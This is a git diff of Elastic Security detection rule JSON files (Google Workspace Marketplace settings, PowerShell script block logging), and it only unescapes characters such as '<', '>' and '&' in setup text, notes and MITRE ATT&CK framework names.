a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_105.json @@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_106.json b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_106.json index 95117539d8c..6b2107fec8d 100644 --- a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_106.json @@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_107.json b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_107.json index 57f9d874a5b..2b00e85fe15 100644 --- a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_107.json +++ b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_107.json @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_104.json index a632baf4200..7a1bd13bdf1 100644 --- a/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_104.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_105.json index 100399ad492..2db52f3c812 100644 --- a/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_105.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Restrictions for Google Marketplace Modified to Allow Any App", - "note": "## Triage and analysis\n\n### Investigating Google Workspace Restrictions for Google Marketplace Modified to Allow Any App\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule identifies when the global allow-all setting is enabled for Google Workspace Marketplace applications.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- Search for `event.action` is `ADD_APPLICATION` to identify applications installed after these changes were made.\n - The `google_workspace.admin.application.name` field will help identify what applications were added.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps \u003e Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Google Workspace administrators may intentionally add an application from the marketplace based on organizational needs.\n - Follow up with the user who added the application to ensure this was intended.\n- Verify the application identified has been assessed thoroughly by an administrator.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Workspace Restrictions for Google Marketplace Modified to Allow Any App\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule identifies when the global allow-all setting is enabled for Google Workspace Marketplace applications.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- Search for `event.action` is `ADD_APPLICATION` to identify applications installed after these changes were made.\n - The `google_workspace.admin.application.name` field will help identify what applications were added.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps > Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Google Workspace administrators may intentionally add an application from the marketplace based on organizational needs.\n - Follow up with the user who added the application to ensure this was intended.\n- Verify the application identified has been assessed thoroughly by an administrator.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:\"CHANGE_APPLICATION_SETTING\" and event.category:(iam or configuration)\n and google_workspace.event.type:\"APPLICATION_SETTINGS\" and google_workspace.admin.application.name:\"Google Workspace Marketplace\"\n and google_workspace.admin.setting.name:\"Apps Access Setting Allowlist access\" and google_workspace.admin.new_value:\"ALLOW_ALL\"\n", "references": [ "https://support.google.com/a/answer/6089179?hl=en" @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_106.json index 3ae589e33e4..5dd4257388b 100644 --- a/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_106.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Restrictions for Google Marketplace Modified to Allow Any App", - "note": "## Triage and analysis\n\n### Investigating Google Workspace Restrictions for Google Marketplace Modified to Allow Any App\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule identifies when the global allow-all setting is enabled for Google Workspace Marketplace applications.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- Search for `event.action` is `ADD_APPLICATION` to identify applications installed after these changes were made.\n - The `google_workspace.admin.application.name` field will help identify what applications were added.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps \u003e Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Google Workspace administrators may intentionally add an application from the marketplace based on organizational needs.\n - Follow up with the user who added the application to ensure this was intended.\n- Verify the application identified has been assessed thoroughly by an administrator.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Workspace Restrictions for Google Marketplace Modified to Allow Any App\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule identifies when the global allow-all setting is enabled for Google Workspace Marketplace applications.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- Search for `event.action` is `ADD_APPLICATION` to identify applications installed after these changes were made.\n - The `google_workspace.admin.application.name` field will help identify what applications were added.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps > Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Google Workspace administrators may intentionally add an application from the marketplace based on organizational needs.\n - Follow up with the user who added the application to ensure this was intended.\n- Verify the application identified has been assessed thoroughly by an administrator.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:\"CHANGE_APPLICATION_SETTING\" and event.category:(iam or configuration)\n and google_workspace.event.type:\"APPLICATION_SETTINGS\" and google_workspace.admin.application.name:\"Google Workspace Marketplace\"\n and google_workspace.admin.setting.name:\"Apps Access Setting Allowlist access\" and google_workspace.admin.new_value:\"ALLOW_ALL\"\n", "references": [ "https://support.google.com/a/answer/6089179?hl=en" @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_2.json b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_2.json index cb663a93885..778fb86a932 100644 --- a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_2.json +++ b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_2.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "a2d04374-187c-4fd9-b513-3ad4e7fdd67a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_3.json b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_3.json index c10b10d862d..52a664dc2ed 100644 --- a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_3.json +++ b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_3.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "a2d04374-187c-4fd9-b513-3ad4e7fdd67a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_4.json b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_4.json index fc9abb0d191..e5e0095523a 100644 --- a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_4.json +++ b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_4.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "a2d04374-187c-4fd9-b513-3ad4e7fdd67a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_5.json b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_5.json index 64b2ba2e995..f190471f99a 100644 --- a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_5.json +++ b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_5.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "a2d04374-187c-4fd9-b513-3ad4e7fdd67a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_6.json b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_6.json index 5c08a273800..7414a5c2480 100644 --- a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_6.json +++ b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_6.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "a2d04374-187c-4fd9-b513-3ad4e7fdd67a", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_103.json b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_103.json index b8caa522f01..207a71c6645 100644 --- a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_103.json +++ b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_103.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this 